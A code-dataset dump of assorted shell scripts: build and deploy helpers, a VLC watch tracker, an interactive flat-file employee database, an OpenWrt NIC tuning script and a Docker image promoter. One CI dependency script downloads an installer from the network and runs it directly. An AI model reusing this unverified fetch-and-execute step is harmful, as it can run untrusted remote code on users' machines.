blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
fd6a86d7bbd499bb4b87b5df3aada2e2ca9d24dd
|
Shell
|
riga/cms-bot
|
/cvmfs/cvmfsdirtab.sh
|
UTF-8
| 825
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# Emit CVMFS directory-table entries (one glob pattern per line on stdout)
# for each top-level CMS directory passed as an argument.
# Usage: cvmfsdirtab.sh <cmsdir>...
# Fix: quote "$@" so arguments are not re-split or glob-expanded.
for cmsdir in "$@" ; do
    # Shared files
    echo "/${cmsdir}/share"
    for x in cms/data-L1Trigger-L1TMuon cms/data-GeneratorInterface-EvtGenInterface 'cms/data-MagneticField-Interpolation/*' ; do
        echo "/${cmsdir}/share/${x}"
    done
    # cmssw externals
    echo "/${cmsdir}/*_*_*/external/*"
    for x in blackhat boost cuda geant4 geant4-G4EMLOW herwigpp madgraph5amcatnlo py2-pippkgs py2-pippkgs_depscipy sherpa rivet; do
        echo "/${cmsdir}/*_*_*/external/${x}/*"
    done
    # Some special directories
    for x in cms lcg lcg/root ; do
        echo "/${cmsdir}/*_*_*/${x}"
    done
    # for cmssw releases
    for x in cmssw cmssw-patch ; do
        echo "/${cmsdir}/*_*_*/cms/${x}/CMSSW_*/src"
        echo "/${cmsdir}/*_*_*/cms/${x}/CMSSW_*"
    done
    # for cuda-compatible-runtime
    echo "/${cmsdir}/cuda-compatible-runtime/v2*"
done
| true
|
b1965ab0aa0a552ba43736de00a7232b96dbe627
|
Shell
|
Bopzor/sib
|
/sib.sh
|
UTF-8
| 1,173
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Play a video file in VLC (inside a detached tmux session, with VLC's HTTP
# interface enabled) and, on Ctrl-C, query the playback position; if the file
# was watched nearly to the end, hide it (and matching .srt subtitles) by
# renaming to a dot-file.
if [ $# -eq 0 ]
then
echo "This script need a video file to read"
echo -e "\nUsage:\nsib FILE \n"
exit 1
fi
# trap ctrl-c and call ctrl_c()
trap ctrl_c INT
SIB_SESSION="sib-session"
file="$1"
dirname=$(dirname "$file")
filename=$(basename "$file")
name="${filename%.*}"
pathname="$PWD/$dirname"
echo "Curently watching $name..."
# Ctrl-C handler: read VLC's status over its HTTP interface, kill the tmux
# session, then hide the file if position > 0.95.
function ctrl_c() {
output=$(curl -s "http://:${USER}@localhost:9090/requests/status.xml" | grep position)
regex="[0-1].[0-9]*"
[[ "$output" =~ $regex ]]
position="${BASH_REMATCH[0]}"
tmux kill-session -t "$SIB_SESSION"
# NOTE(review): [[ ... > ... ]] is a lexicographic string comparison, not a
# numeric one; for values shaped "0.NN"/"1.0" it happens to order correctly,
# but confirm VLC never reports e.g. "1" vs "0.95" edge cases.
if [[ "$position" > 0.95 ]]
then
mv "$pathname/$filename" "$pathname/.$filename"
# also hide matching subtitle files, plain and language-suffixed
for lang in '' '.fr' '.en'
do
if [[ -f "$pathname/$name${lang}.srt" ]]
then
mv "$pathname/$name${lang}.srt" "$pathname/.$name${lang}.srt"
fi
done
else
echo -e "\n$name hasn't been fully watched"
fi
exit "$?"
}
# VLC HTTP interface: empty user, password = $USER, port 9090 (see ctrl_c URL)
tmux new-session -d -s "$SIB_SESSION" vlc --extraintf http --http-password "$USER" --http-host localhost --http-port 9090 "$file"
# keep script running until ctrl-c
read -r -d '' _ </dev/tty
| true
|
82d62f09543d64b187ace8cc0b317e7f35dd1259
|
Shell
|
FSMaxB/lfs-me-repos
|
/7.6-systemd/XML-Parser-2.42_01
|
UTF-8
| 498
| 2.875
| 3
|
[] |
no_license
|
# lfs-me package-build file for perl XML-Parser. Sourced by the lfs-me build
# tool, which supplies $sources_dir / $build_dir and invokes the lfs_me_*
# hook functions defined below.
pkgbuild_version=5
pkgname=XML-Parser
pkgver=2.42_01
# NOTE(review): "!$pkgname" presumably marks a conflict with / replacement of
# an installed XML-Parser -- confirm against lfs-me's dependency syntax.
dependencies=(
"!$pkgname"
'expat'
'perl'
)
sources=(
"http://cpan.metacpan.org/authors/id/T/TO/TODDR/${pkgname}-${pkgver}.tar.gz"
)
sha1sums=(
2fd519619aa47c8c330365358c6783f4e5ed916c
)
# Unpack the source tarball into the build dir and generate the Makefile.
lfs_me_prepare() {
tar -xf "${sources_dir}/${pkgname}-${pkgver}.tar.gz" -C "$build_dir"
cd "${build_dir}/${pkgname}-${pkgver}"
perl Makefile.PL
}
# Run the upstream test suite.
lfs_me_check() {
cd "${build_dir}/${pkgname}-${pkgver}"
make test
}
# vim:set syntax=sh et:
| true
|
ea00934d6eeca68dc7ab53b00913a66565b0eb9f
|
Shell
|
VinsUni/sdp-cytoscape3
|
/scripts/deploy.sh
|
UTF-8
| 275
| 2.84375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Deploy every app found one level below $DEV_APPS_DIR by invoking that app's
# own scripts/deploy.sh with a minimal environment (only DEV_CY3_BUNDLE_DIR).
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"/../
cd "${DIR}" || exit 1
# env.sh provides DEV_APPS_DIR and DEV_CY3_BUNDLE_DIR
. env.sh || exit 1
# Fix: iterate find results NUL-delimited instead of word-splitting a
# backtick substitution, so app paths containing whitespace survive.
while IFS= read -r -d '' app; do
    env -i DEV_CY3_BUNDLE_DIR="$DEV_CY3_BUNDLE_DIR" bash "$app/scripts/deploy.sh"
done < <(find "$DEV_APPS_DIR" -mindepth 1 -maxdepth 1 -type d -print0)
| true
|
d63715575086f492a4d742f9da1e343f10685769
|
Shell
|
redshirtrob/binfiles
|
/dual-monitor.sh
|
UTF-8
| 347
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Move workspaces to HDMI-2
#
# usage: dual-monitor.sh
# Enable the external HDMI-2 output at its preferred mode, to the right of
# the laptop panel (eDP-1).
xrandr --output eDP-1 --auto --output HDMI-2 --auto --right-of eDP-1
# Space-separated list of the workspace numbers that i3 reports on HDMI-2.
workspaces=$(i3-msg -t get_workspaces | jq '.[] | select(.output == "HDMI-2") | .num' | tr '\n' ' ')
# $workspaces is intentionally unquoted so the list word-splits into one
# workspace number per iteration.
for workspace in $workspaces
do
i3-msg "workspace $workspace, move workspace to output HDMI-2"
done
| true
|
ada053c639d4d5a0cd36345604bd5695903769d5
|
Shell
|
JulianGoeltz/myConfigFiles
|
/toolbox/lockAlt.sh
|
UTF-8
| 526
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# set -euo pipefail
# Alternative "lock" screen: silences dunst notifications, mirrors the
# external display onto the laptop panel, shows a fullscreen Chrome kiosk
# page (fake macOS update screen) until it is closed, then restores the
# display layout and the previous dunst pause state.
# pausing dunst to not show notifs on lock screen
state_of_dunst=$(dunstctl is-paused)
dunstctl set-paused true
# mirror the external DP2-2 output onto the internal eDP1 panel
xrandr --output DP2-2 --mode 1920x1080 --same-as eDP1
# NOTE(review): --proxy-server="foopy:99" points at a non-existent proxy --
# presumably to keep the kiosk page offline; confirm intent.
/usr/bin/google-chrome-stable "/home/julgoe/Documents/apple_update_screen/macOSUpdates.html" --proxy-server="foopy:99" --kiosk 2>/dev/null
# restore the normal screen layout once Chrome exits
/home/julgoe/myConfigFiles/toolbox/screenSet.sh
# resuming if it wasn't paused before locking; but sleep first
sleep 3
[[ "$state_of_dunst" = 'false' ]] && dunstctl set-paused false
| true
|
21b36b4a9689b58e0481a1e694b345525d26c4f0
|
Shell
|
Karkanius/MIECT
|
/Ano_2/LFA/antlr4-bin-v5/bin/antlr4
|
UTF-8
| 197
| 2.859375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Launcher for the ANTLR4 tool.
# If ANTLR4_PATH is set, put the newest antlr-4*-complete.jar found there on
# the classpath; otherwise assume org.antlr.v4.Tool is already resolvable.
# All script arguments are forwarded unchanged.
# Fix: forward arguments with "$@" (not bare $*), and quote expansions, so
# grammar file names containing spaces are passed through intact.
if [ -z "$ANTLR4_PATH" ]; then
    java -ea org.antlr.v4.Tool "$@"
else
    # `tail -1` picks the last (highest-versioned) matching jar
    java -ea -cp .:"$(ls --color=never "$ANTLR4_PATH"/antlr-4*-complete.jar | tail -1)" org.antlr.v4.Tool "$@"
fi
exit $?
| true
|
02204980ff3b3060a17f6abd2365b39ca70bf2e4
|
Shell
|
strayfluxinteractive/strayflux
|
/tools/dependencies.sh
|
UTF-8
| 874
| 3.125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# CI bootstrap: installs the project's build dependencies on Ubuntu
# (biicode, the g++-4.8 toolchain, and CMake 3.0.2).
# Exit immediately if a command exits with a non-zero status
set -e
# Print commands and their arguments as they are executed.
set -x
# Bii code
wget http://apt.biicode.com/install.sh && chmod +x install.sh && ./install.sh
rm install.sh
# G++
sudo add-apt-repository ppa:ubuntu-toolchain-r/test -y
sudo apt-get update -qq
# Only install/select g++-4.8 when the build is configured for g++ (the CI
# matrix presumably also runs clang -- confirm)
if [ "$CXX" = "g++" ]; then sudo apt-get install -qq g++-4.8; fi
if [ "$CXX" = "g++" ]; then export CXX="g++-4.8" CC="gcc-4.8"; fi
sudo update-alternatives --install /usr/bin/g++ g++ /usr/bin/g++-4.8 90
sudo apt-get install gcc
sudo update-alternatives --install /usr/bin/gcov gcov /usr/bin/gcov-4.8 90
# Cmake
wget https://s3.amazonaws.com/biibinaries/thirdparty/cmake-3.0.2-Linux-64.tar.gz
tar -xzf cmake-3.0.2-Linux-64.tar.gz
sudo cp -fR cmake-3.0.2-Linux-64/* /usr
rm -rf cmake-3.0.2-Linux-64
rm cmake-3.0.2-Linux-64.tar.gz
| true
|
2d8af30f61692626d34f499960db12be19eb9e26
|
Shell
|
xzpeter/small-stuffs
|
/e
|
UTF-8
| 635
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
# e -- open file(s) in a running emacs via emacsclient, supporting the
# `e file.c:14` syntax by rewriting "file:line" into "+line file".
# we have to use sed working both on Mac OS and Linux.
if uname | grep -qiE 'darwin|freebsd'; then
# this is MacOS
sed_prm=-E
elif uname | grep -qi linux; then
sed_prm=-r
else
echo "Unknown system!"
exit 1
fi
# we should support things like:
# $ e file.c:14
# this should edit file.c with line 14
prms=`echo $@ | sed $sed_prm 's/([^ :]+):([0-9]+)/+\2 \1/g'`
# true if an emacs process is already running
function emacs_running ()
{
pgrep -x emacs >/dev/null
}
# -a emacs: emacsclient starts emacs itself if no server is up; $prms is
# deliberately unquoted so the rewritten "+line file" pairs word-split into
# separate arguments.
emacsclient -a emacs $prms >/dev/null 2>&1 &
# there are possibly one chance to fail, that is $#==0. Let's start emacs
# if no emacs running.
if ! emacs_running && [[ $# == 0 ]] ; then
emacs &
fi
| true
|
9434132b7ae27a0f77d50c0e571b113d84c95e11
|
Shell
|
8688Add/OpenWrt-CI
|
/x86/myautocore/files/x86/autocore
|
UTF-8
| 1,272
| 2.75
| 3
|
[] |
permissive
|
#!/bin/sh /etc/rc.common
# Copyright (C) 2017 lean <coolsnowwolf@gmail.com>
# OpenWrt rc.common init script: tunes RPS/RFS on all eth* rx queues, records
# the DMI board name as the device model, and enables NIC offloads where the
# hardware supports them (errors silently ignored per-feature).
START=99
start()
{
rfc=4096
cc=$(grep -c processor /proc/cpuinfo)
# rps_sock_flow_entries = cpu count * per-queue flow count
rsfe=$(echo $cc*$rfc | bc)
sysctl -w net.core.rps_sock_flow_entries=$rsfe >/dev/null
for fileRps in $(ls /sys/class/net/eth*/queues/rx-*/rps_cpus)
do
echo $cc > $fileRps
done
for fileRfc in $(ls /sys/class/net/eth*/queues/rx-*/rps_flow_cnt)
do
echo $rfc > $fileRfc
done
uci set network.@globals[0].packet_steering=1
uci commit network
# model string: the text after "DMI:" up to ", B..." in the kernel log
g=$(dmesg | grep 'DMI:' | awk -F ', B' '{print $1 }' | awk -F ':' '{print $2 }')
[ -d /tmp/sysinfo ] || mkdir -p /tmp/sysinfo
echo $g > /tmp/sysinfo/model
# eth* interface names, stripped of any "@vlan" suffix, max 7 chars
for c in $(ip address | awk -F ': ' '/eth[0-9]+/ {print $2}' | awk -F '@' {'print $1'} | awk '{ if ( length($0) <=7 ) print $0}' | xargs)
do
ethtool -K $c rx-checksum on >/dev/null 2>&1
# try generic tx checksumming first, else fall back to v4/v6-specific flags
ethtool -K $c tx-checksum-ip-generic on >/dev/null 2>&1 || (
ethtool -K $c tx-checksum-ipv4 on >/dev/null 2>&1
ethtool -K $c tx-checksum-ipv6 on >/dev/null 2>&1)
ethtool -K $c tx-scatter-gather on >/dev/null 2>&1
ethtool -K $c gso on >/dev/null 2>&1
ethtool -K $c tso on >/dev/null 2>&1
ethtool -K $c ufo on >/dev/null 2>&1
done
[ -f /etc/index.htm ] && mv /etc/index.htm /usr/lib/lua/luci/view/admin_status/index.htm
}
| true
|
776cc6c476a5bc78fc952cd6b3c6c13d513085d8
|
Shell
|
xenserver/planex-release
|
/build.sh
|
UTF-8
| 955
| 3.171875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -xe
# build_release DIST_NAME DIST_VERSION RELEASE_TYPE
# Renders the spec and yum-repo templates for RELEASE_TYPE, builds the noarch
# planex-<type> RPM for DIST_NAME/DIST_VERSION, and publishes it under a
# createrepo-managed tree.
build_release() {
DIST_NAME=$1
DIST_VERSION=$2
RELEASE_TYPE=$3
sed -e "s/@RELEASE_TYPE@/${RELEASE_TYPE}/g" SPECS/planex-release.spec.in > SPECS/planex-${RELEASE_TYPE}.spec
sed -e "s/@DIST@/${DIST_NAME}/g" -e "s/@DIST_VERSION@/${DIST_VERSION}/g" -e "s/@RELEASE_TYPE@/${RELEASE_TYPE}/g" SOURCES/planex.repo.in > SOURCES/planex-${RELEASE_TYPE}.repo
rpmbuild --define "_topdir ${PWD}" --define "version ${DIST_VERSION}" --define "dist_name ${DIST_NAME}" --bb SPECS/planex-${RELEASE_TYPE}.spec
mkdir -p ${RELEASE_TYPE}/rpm/${DIST_NAME}/${DIST_VERSION}
# NOTE(review): the rpm is moved into .../rpm/${DIST_NAME} while createrepo
# below indexes .../rpm/${DIST_NAME}/${DIST_VERSION} -- one of the two paths
# looks wrong (the version dir would stay empty); confirm which directory
# releases are actually served from.
mv RPMS/noarch/planex-${RELEASE_TYPE}-${DIST_VERSION}-1.noarch.rpm ${RELEASE_TYPE}/rpm/${DIST_NAME}
createrepo ${RELEASE_TYPE}/rpm/$DIST_NAME/${DIST_VERSION}
}
build_release fedora 23 release
build_release fedora 24 release
build_release el 7 release
build_release fedora 23 unstable
build_release fedora 24 unstable
build_release el 7 unstable
| true
|
cd7a1175c1fec81ca041189dead5e7fede110e49
|
Shell
|
DEVPARMAR06/lucifer
|
/DBMS.sh
|
UTF-8
| 7,108
| 3.171875
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Interactive flat-file employee "DBMS" over the pipe-delimited data file
# pr-8ans (fields: id | name | department | salary). A menu loop offers:
# view, insert (with unique-id check), search, delete, update, and sort.
# Temp files used: try123 (one extracted column), emp (matching line
# numbers), pr-8-delete and sorting (rewrite buffers).
# NOTE(review): `echo "\n..."` relies on an echo that interprets backslash
# escapes by default (e.g. dash's builtin) -- confirm the intended shell.
echo "--> DBMS Functions <--"
while [ true ]
do
echo "\n1.View All \n2.Insert \n3.Search \n4.Delete \n5.Update \n6.Sort \n7.Exit"
echo "Enter Choice: "
read c
while [ -z $c ]
do
# NOTE(review): missing `echo` -- this line executes the prompt text as a
# command instead of printing it.
"Enter Choice: "
read c
done
#-----------------------------------------------------------------------
# 1) View all records
if [ $c -eq 1 ]
then
cat pr-8ans
#-----------------------------------------------------------------------
# 2) Insert a record (re-prompts until an unused employee id is entered)
elif [ $c -eq 2 ]
then
while [ true ]
do
echo "Enter Employee Id :"
read eid
while [ -z $eid ]
do
echo "Enter Employee Id :"
read eid
done
cut -d"|" -f1 pr-8ans | cat > try123
b=$(grep -n -w -i $eid try123 | cut -f1 -d":")
if [ -z $b ]
then
break
else
echo "--> Enter Unique Employee Id <--"
fi
done
echo "Employee Name:"
read ename
while [ -z $ename ]
do
echo "Employee Name:"
read ename
done
echo "Employee Department :"
read edep
while [ -z $edep ]
do
echo "Employee Department :"
read edep
done
echo "Employee Salary :"
read esal
while [ true ]
do
if [ -z $esal ]
then
echo "Employee Salary :"
read esal
elif [ $esal -le 0 ]
then
echo "Employee Salary :"
read esal
else
break
fi
done
echo "$eid | $ename | $edep | $esal" >> pr-8ans
#-----------------------------------------------------------------------
# 3) Search by id / name / department / salary; prints matching lines
elif [ $c -eq 3 ]
then
echo "\n1. Search By Employee Id \n2. Search By Name \n3. Search By Department \n4. Search By Salary "
read choice
if [ $choice -eq 1 ]
then
cut -d"|" -f1 pr-8ans | cat > try123
echo "Enter Employee Id :"
read db
while [ -z $db ]
do
echo "Enter Employee Id :"
read db
done
b=$(grep -n -w -i $db try123 | cut -f1 -d":")
if [ -z $b ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
if [ $i -eq $b ]
then
echo $line
fi
i=`expr $i + 1`
done
fi
elif [ $choice -eq 2 ]
then
cut -d"|" -f2 pr-8ans | cat > try123
echo "Enter Name :"
read ena
while [ -z $ena ]
do
echo "Enter Name :"
read ena
done
grep -n -i -w $ena try123 | cut -f1 -d":" | cat > emp
l=$(wc -l < emp)
if [ $l -eq 0 ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
cat emp | while read j
do
if [ $i -eq $j ]
then
echo $line
fi
done
i=`expr $i + 1`
done
fi
elif [ $choice -eq 3 ]
then
cut -d"|" -f3 pr-8ans | cat > try123
echo "Employee Department"
read Ed
while [ -z $Ed ]
do
echo "Employee Department:"
read Ed
done
grep -n -i -w $Ed try123 | cut -f1 -d":" | cat > emp
l=$(wc -l < emp)
if [ $l -eq 0 ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
cat emp | while read j
do
if [ $i -eq $j ]
then
echo $line
fi
done
i=`expr $i + 1`
done
fi
elif [ $choice -eq 4 ]
then
cut -d"|" -f4 pr-8ans | cat > try123
echo "Employee Salary:"
read sa
while [ -z $sa ]
do
echo "Employee Salary:"
read sa
done
grep -n -i -w $sa try123 | cut -f1 -d":" | cat > emp
l=$(wc -l < emp)
if [ $l -eq 0 ]
then
echo "Not Found"
else
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
cat emp | while read j
do
if [ $i -eq $j ]
then
echo $line
fi
done
i=`expr $i + 1`
done
fi
else
echo "--> Wrong Choice <--"
fi
#-----------------------------------------------------------------------
# 4) Delete a record by id (rewrite the file without the matching line)
elif [ $c -eq 4 ]
then
cut -d"|" -f1 pr-8ans | cat > try123
echo "Enter Employee Id :"
read db
while [ -z $db ]
do
echo "Enter Employee Id :"
read db
done
b=$(grep -n -w -i $db try123 | cut -f1 -d":")
if [ -z $b ]
then
echo "Not Found"
else
touch pr-8-delete
len=$(wc -l < pr-8ans)
i=1
cat pr-8ans | while read line
do
if [ $i -ne $b ]
then
echo "$line" >> pr-8-delete
fi
i=`expr $i + 1`
done
cat pr-8-delete > pr-8ans
rm pr-8-delete
fi
#-----------------------------------------------------------------------
# 5) Update one field of a record by id (other fields re-read from the file)
elif [ $c -eq 5 ]
then
cut -d"|" -f1 pr-8ans | cat > try123
echo "Enter Employee Id :"
read db
while [ -z $db ]
do
echo "Enter Employee Id :"
read db
done
b=$(grep -n -w -i $db try123 | cut -f1 -d":")
if [ -z $b ]
then
echo "Not Found"
else
touch pr-8-delete
#len=$(wc -l < pr-8ans)
#i=1
x=0
#touch edit
#cat pr-8ans | while read line
#do
#if [ "$i" -eq "$b" ]
#then
#echo $line >> edit
#uename=$(cut -d"|" -f2 edit)
#uedep=$(cut -d"|" -f3 edit)
#uesal=$(cut -d"|" -f4 edit)
#fi
#i=`expr $i + 1`
#done
echo "\n1.Update Name \n2.Update Department \n3.Update Salary"
read va
if [ $va -eq 1 ]
then
echo "Employee Name:"
read uename
while [ -z $uename ]
do
echo "Employee Name:"
read uename
done
uedep=$(grep -i -w $db pr-8ans | cut -f3 -d"|")
uesal=$(grep -i -w $db pr-8ans | cut -f4 -d"|")
elif [ $va -eq 2 ]
then
echo "Employee Department :"
read uedep
while [ -z $uedep ]
do
echo "Employee Department :"
read uedep
done
uename=$(grep -i -w $db pr-8ans | cut -f2 -d"|")
uesal=$(grep -i -w $db pr-8ans | cut -f4 -d"|")
elif [ $va -eq 3 ]
then
echo "Employee Salary :"
read uesal
while [ true ]
do
if [ -z $uesal ]
then
echo "Employee Salary :"
read uesal
elif [ $uesal -le 0 ]
then
echo "Employee Salary :"
read uesal
else
break
fi
done
uedep=$(grep -i -w $db pr-8ans | cut -f3 -d"|")
uename=$(grep -i -w $db pr-8ans | cut -f2 -d"|")
else
echo "--> Wrong Choice <--"
rm pr-8-delete
#rm edit
x=1
fi
i=1
# x=0 means a valid sub-choice was made; rewrite the file with the updated row
if [ $x -eq 0 ]
then
cat pr-8ans | while read line
do
if [ $i -ne $b ]
then
echo "$line" >> pr-8-delete
else
echo "$db | $uename | $uedep | $uesal" >> pr-8-delete
fi
i=`expr $i + 1`
done
cat pr-8-delete > pr-8ans
rm pr-8-delete
#rm edit
fi
fi
#-----------------------------------------------------------------------
# 6) Sort by a chosen column; optionally write the sorted data back
elif [ $c -eq 6 ]
then
touch sorting
echo "\n1. Sort By Employee Id \n2. Sort By Name \n3. Sort By Department \n4. Sort By Salary "
read cho
if [ $cho -eq 1 ]
then
echo "---------------------------------------------------"
sort -t "|" -k 1 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
elif [ $cho -eq 2 ]
then
echo "---------------------------------------------------"
sort -t "|" -k 2 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
elif [ $cho -eq 3 ]
then
echo "---------------------------------------------------"
sort -t "|" -k 3 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
elif [ $cho -eq 4 ]
then
echo "---------------------------------------------------"
# salary is numeric, hence sort -n here
sort -n -t "|" -k 4 pr-8ans | cat > sorting
cat sorting
echo "---------------------------------------------------"
echo "\n You Want To Update Sorted Data In Database? 1(YES)/0(NO)"
read l
if [ $l -eq 1 ]
then
cat sorting > pr-8ans
fi
else
echo "--> Wrong Choice <--"
fi
rm -r sorting
#-----------------------------------------------------------------------
# 7) Exit
elif [ $c -eq 7 ]
then
echo "---> Thanks For Using <---"
break
else
echo "---> Wrong Choice <---"
fi
#-----------------------------------------------------------------------
done
| true
|
7d1867505fbb72d9d2381255959399d60e30205a
|
Shell
|
rapidsai/dask-cudf
|
/ci/release/update-version.sh
|
UTF-8
| 1,500
| 4.25
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#############################
# dask-cudf Version Updater #
#############################
## Usage
# bash update-version.sh <type>
# where <type> is either `major`, `minor`, `patch`
set -e
# Grab argument for release type
RELEASE_TYPE=$1
# Get the current version from the newest vX.Y.Z git tag and pre-compute the
# candidate next major/minor/patch numbers.
CURRENT_TAG=`git tag | grep -xE 'v[0-9\.]+' | sort --version-sort | tail -n 1 | tr -d 'v'`
CURRENT_MAJOR=`echo $CURRENT_TAG | awk '{split($0, a, "."); print a[1]}'`
CURRENT_MINOR=`echo $CURRENT_TAG | awk '{split($0, a, "."); print a[2]}'`
CURRENT_PATCH=`echo $CURRENT_TAG | awk '{split($0, a, "."); print a[3]}'`
NEXT_MAJOR=$((CURRENT_MAJOR + 1))
NEXT_MINOR=$((CURRENT_MINOR + 1))
NEXT_PATCH=$((CURRENT_PATCH + 1))
NEXT_FULL_TAG=""
NEXT_SHORT_TAG=""
# Determine release type
if [ "$RELEASE_TYPE" == "major" ]; then
NEXT_FULL_TAG="${NEXT_MAJOR}.0.0"
NEXT_SHORT_TAG="${NEXT_MAJOR}.0"
elif [ "$RELEASE_TYPE" == "minor" ]; then
NEXT_FULL_TAG="${CURRENT_MAJOR}.${NEXT_MINOR}.0"
NEXT_SHORT_TAG="${CURRENT_MAJOR}.${NEXT_MINOR}"
elif [ "$RELEASE_TYPE" == "patch" ]; then
NEXT_FULL_TAG="${CURRENT_MAJOR}.${CURRENT_MINOR}.${NEXT_PATCH}"
# Bug fix: a patch release stays on the current minor series, so the short
# tag must use CURRENT_MINOR (was NEXT_MINOR, which pointed one series ahead
# and disagreed with NEXT_FULL_TAG above).
NEXT_SHORT_TAG="${CURRENT_MAJOR}.${CURRENT_MINOR}"
else
echo "Incorrect release type; use 'major', 'minor', or 'patch' as an argument"
exit 1
fi
echo "Preparing '$RELEASE_TYPE' release [$CURRENT_TAG -> $NEXT_FULL_TAG]"
# Inplace sed replace; workaround for Linux and Mac
function sed_runner() {
sed -i.bak ''"$1"'' $2 && rm -f ${2}.bak
}
#No-op
| true
|
31f8d415a79dcd01c2190bea98d98ff1d462a699
|
Shell
|
hakoerber/wine-scripts
|
/splinter-cell-chaos-theory/scripts/start.bash
|
UTF-8
| 355
| 2.546875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Launch Splinter Cell: Chaos Theory through the shared wine start script.
# Fix: quote "$0" inside dirname (and hoist the repeated call) so a script
# path containing spaces does not break the source/export lines.
script_dir="$(dirname "$0")"
source "$script_dir/../../common/settings.bash"
source "$script_dir/info.bash"
# Variables consumed by $STARTSCRIPT (defined in settings.bash):
export INFOFILE="$script_dir/info.bash"
export EXECPATH="drive_c/Program Files/Ubisoft/Tom Clancy's Splinter Cell Chaos Theory/System/splintercell3.exe"
export OPTIONS="explorer /desktop=d1,1920x1080"
"$STARTSCRIPT" "$INFOFILE" "$EXECPATH" "$OPTIONS"
| true
|
fde0eb3a45b3d6aa87484889e7ee886b3d59b84f
|
Shell
|
deepaksrivastav/promote-to
|
/build.sh
|
UTF-8
| 843
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Promote a Docker image: pull from the source registry, re-tag, and push to
# the target registry, installing OpenShift-mounted pull/push secrets when
# they are present.
set -o pipefail
IFS=$'\n\t'
DOCKER_SOCKET=/var/run/docker.sock
# Talking to the docker daemon requires its socket to be mounted in.
if [ ! -e "${DOCKER_SOCKET}" ]; then
echo "Docker socket missing at ${DOCKER_SOCKET}"
exit 1
fi
if [ -n "${SOURCE_IMAGE}" ]; then
SOURCE_TAG="${SOURCE_REGISTRY}/${SOURCE_IMAGE}"
fi
if [ -n "${TARGET_IMAGE}" ]; then
TARGET_TAG="${TARGET_REGISTRY}/${TARGET_IMAGE}"
fi
ls -lr /var/run/secrets/openshift.io/
# Pull secret: install only if mounted and no docker config exists yet.
if [[ -d /var/run/secrets/openshift.io/pull ]] && [[ ! -e /root/.dockercfg ]]; then
cp /var/run/secrets/openshift.io/pull/.dockercfg /root/.dockercfg
fi
docker pull "${SOURCE_TAG}"
docker tag -f "${SOURCE_TAG}" "${TARGET_TAG}"
# Push secret. Bug fixes: the original copied the secret unconditionally
# (failing noisily when absent) and then guarded a second copy with `-d`,
# which can never be true for a regular file; test the file itself with -f.
if [ -f /tmp/secret1/.dockercfg ]; then
echo "Found push secret"
cp /tmp/secret1/.dockercfg /root/.dockercfg
fi
docker push "${TARGET_TAG}"
docker rmi "${TARGET_TAG}"
| true
|
7a93d65a6295a6678c396c7fac5ee4fcc937e191
|
Shell
|
rokerkony/angular-critical-ie11-bug
|
/scripts/serveDistLocallyNotMinified.sh
|
UTF-8
| 521
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
# Build the app without minification and serve the resulting dist/ locally
# with http-server (useful for debugging, e.g. IE11 issues, against readable
# output).
set -e
_NAME="serve locally:"
## make sure you have clean exit for npm run and CI
echo "$_NAME checking script dependencies"
SCRIPTNAME=${0##*/}
NPM=$(command -v npm) || { echo "$_NAME $SCRIPTNAME: npm is not available"; exit 1; }
echo "$_NAME building a project"
${NPM} run build:notMinified
# Rebuild the _locally-running copy of dist/ from scratch, then nest it back
# under dist/ -- presumably so served paths mirror the deployed layout;
# confirm intent.
rm -rf _locally-running/
rm -rf dist/_locally-running/
cp -R dist/ _locally-running/
mv _locally-running dist/_locally-running/
echo "$_NAME serving"
cd dist/_locally-running/
../../node_modules/.bin/http-server
| true
|
1e83adfafda244f322c704a52223555d0896a551
|
Shell
|
bOmBeLq/symfony-demo
|
/docker.sh
|
UTF-8
| 148
| 2.953125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Run a command inside the symfony-demo-php container as user symfony-demo.
# With no arguments an interactive bash shell is started.
# Usage: docker.sh [command [args...]]
# Fixes: test the argument count with $# instead of the fragile [[ -z "$@" ]],
# and forward the command as separate words ("$@") instead of re-splitting an
# unquoted scalar, so arguments containing spaces survive.
if [ $# -eq 0 ]; then
    set -- bash
fi
docker exec -it -u symfony-demo symfony-demo-php "$@"
| true
|
e55620f09de9987df1e82273afcfd56e668e2f50
|
Shell
|
benkelly/dev-environment
|
/config_server.sh
|
UTF-8
| 3,075
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
